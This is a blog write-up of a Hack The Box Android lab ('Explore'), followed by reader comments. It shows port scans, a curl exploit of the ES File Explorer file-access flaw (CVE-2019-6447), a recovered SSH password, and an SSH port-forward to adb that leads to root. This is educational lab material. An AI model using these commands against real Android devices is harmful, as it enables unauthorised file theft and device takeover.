 |
OS : Android
Difficulty : Easy
INITIAL SCAN [nmap]
i'am always start with nmap scan,its found only one port so i decide to run full ports Scan
But nmap took lot of time so i ran Rustscan
Found Four Ports Are Opened
PORT STATE SERVICE REASON
2222/tcp open EtherNetIP-1 syn-ack
42129/tcp open unknown syn-ack
42135/tcp open unknown syn-ack
59777/tcp open unknown syn-ack
then i ran nmap with -p (smart work)
sudo nmap -sV -sC 10.10.10.247 -p 2222,42129,42135,59777 -oN nmap
PORT STATE SERVICE VERSION
2222/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_ 2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
42129/tcp open unknown
| fingerprint-strings:
| GenericLines:
| HTTP/1.0 400 Bad Request
| Date: Sun, 27 Jun 2021 03:07:01 GMT
| Content-Length: 22
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| GetRequest:
| HTTP/1.1 412 Precondition Failed
| Date: Sun, 27 Jun 2021 03:07:01 GMT
| Content-Length: 0
| HTTPOptions:
| HTTP/1.0 501 Not Implemented
| Date: Sun, 27 Jun 2021 03:07:06 GMT
| Content-Length: 29
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Method not supported: OPTIONS
| Help:
| HTTP/1.0 400 Bad Request
| Date: Sun, 27 Jun 2021 03:07:23 GMT
| Content-Length: 26
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line: HELP
| RTSPRequest:
| HTTP/1.0 400 Bad Request
| Date: Sun, 27 Jun 2021 03:07:06 GMT
| Content-Length: 39
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| valid protocol version: RTSP/1.0
| SSLSessionReq:
| HTTP/1.0 400 Bad Request
| Date: Sun, 27 Jun 2021 03:07:23 GMT
| Content-Length: 73
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| ?G???,???`~?
| ??{????w????<=?o?
| TLSSessionReq:
| HTTP/1.0 400 Bad Request
| Date: Sun, 27 Jun 2021 03:07:25 GMT
| Content-Length: 71
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| ??random1random2random3random4
| TerminalServerCookie:
| HTTP/1.0 400 Bad Request
| Date: Sun, 27 Jun 2021 03:07:25 GMT
| Content-Length: 54
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
|_ Cookie: mstshash=nmap
42135/tcp open http ES File Explorer Name Response httpd
|_http-server-header: ES Name Response Server
|_http-title: Site doesn't have a title (text/html).
59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
Port 2222
its a Ssh Sever for this machine(Android) from Banana Studio
A powerful application allows you to run SSH/SFTP Server on your Android device with full functional terminal.
for more
Then i move to 42129 and 42135 ports,Nothing Interestring but Port 59777
gives something special output yeah its vulnerable to ES File Explorer (CVE-2019–6447)
The ES file browser creates an HTTP service bound to port 59777 at runtime, which provides 10+ commands for accessing data in user’s cell phone and executing the application; however, the service does not check this request. Test, resulting in a security breach.
for more this article gives the full explanation of this vulnerability
Time To Exploit
USER.TEXT
i found a exploit/POC from github..
git clone this then install requirements(pip install -r requirements.txt)
then run
python3 poc.py --cmd getDeviceInfo --ip 10.10.10.247
python poc.py --cmd listFiles --ip 10.10.10.247
or also you can use curl to exploit manually i'm suggest to you use curl coz its clean and good
same out put
so i first start to fuzz with /sdcard
 |
| user.txt |
Command To Use Curl
curl --header "Content-Type: application/json" --request POST --data "{\"command\":\"listFiles\"}" http://10.10.10.247:59777/sdcard/
 |
| USER FLAG |
PRIVILEGE ESCALATION
Its android box so you definitely need Android Debug Bridge(ADB) in your system
what is adb?
Android Debug Bridge (ADB) is a development tool that facilitates communication between an Android device and a personal computer
iam debian(kali) user i use apt package manager for installation
sudo apt-get install android-tools-adb
installation guide(other-distros)
its your first android box then you need to learn something about Android Pentesting so i suggest tryhackme room(free)
Tryhackme here
Okkkkk... its enough detail about basic android pentest
Time to Root
Further enumeration i found creds.jpg
location : http://10.10.10.247:59777/sdcard/DCIM/creds.jpg
 |
| creds for ssh |
We Know PORT 2222 is Ssh Service running(nmap o/p)
and also we have creds so login via ssh
ssh kristi@10.10.10.247 -p 2222
password : Kr1sT!5h@Rp3xPl0r3!
then i found a another interstring article here
ATACK SENARIO
Android devices Being Shipped with TCP Port 5555 Enabled so we port forward 5555(port) to our localhost then exploit via adb get shell :)
sudo ssh -p 2222 -L 5555:localhost:5555 kristi@explore.htb
STEPS TO BECAME ROOT
in adb shell(right-side-of-the-img) run
su
we are now root
then search root.txt (with super fast openvpn connection) Box is very slow i'm so frustrating to find root.txt
Finally flound that in /data/root.txt
I HOPE YOU UNDERSTAND SOMETHING ABOUT BASIC ANDROID PENTESTING .....
Vera level bro 🔥
ReplyDeleteThanks bro❤️😉
DeleteThanks much mr, This writeup is very understandable
ReplyDeleteThankyou 😊
DeletePost a Comment